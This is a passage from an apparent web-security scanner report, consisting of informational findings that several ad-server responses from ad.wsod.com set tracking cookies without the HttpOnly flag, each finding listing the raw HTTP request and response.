Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:44:56 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 721
Date: Tue, 06 Sep 2011 12:44:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...

10.12. http://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3%7Ced=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3%7Ced=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (c_34 in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3%7Ced=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: c_34=2:68:103:4:147948:55175:1315313317:L; expires=Fri, 07-Oct-2011 12:48:37 GMT; path=/
Location: https://us.etrade.com/e/t/jumppage/viewjumppage?PageName=top_bullish_stocks&SC=S047401&o_id=60DAY+500&symbol=&ch_id=d&s_id=yhoo&c_id=BLLST
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


10.13. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (c_1 in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=46:1542:1206:131:1736690:55175:1315313319:L; expires=Fri, 07-Oct-2011 12:48:39 GMT; path=/
Location: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


10.14. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (i_34 in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.31599?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:18 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1471

   function wsod_image104() {
       document.write('<a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEz
...[SNIP]...

10.15. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (i_34 in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs%3Dxss?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&click=http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286070877?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1182

   function wsod_image68() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpAR
...[SNIP]...

10.16. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (i_34 in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:68:103:4:0:55175:1315313297:L|2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1284

   function wsod_image68() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpj
...[SNIP]...

10.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (i_1 in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs%3Dxss?yhdata=ycg=&yyob=&zip=,&ybt=&&click=http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.3746751663275063?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; expires=Fri, 07-Oct-2011 12:48:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1027

   function wsod_image1542() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.
...[SNIP]...

10.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (i_1 in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?yhdata=ycg=&yyob=&zip=,&ybt=&&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L; expires=Fri, 07-Oct-2011 12:48:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1142

   function wsod_image1542() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wj
...[SNIP]...

10.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/474.207.tk.TEXT/1315313093322187

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/474.207.tk.TEXT/1315313093322187

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (i_1 in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/474.207.tk.TEXT/1315313093322187 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:44:58 GMT
Content-Type: image/gif
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:474:207:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; expires=Fri, 07-Oct-2011 12:44:58 GMT; path=/
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 42

GIF89a.............!.......,...........L.;

10.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/675.22.tk.120x301315313093322187

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/675.22.tk.120x301315313093322187

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (i_1 in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/675.22.tk.120x301315313093322187 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
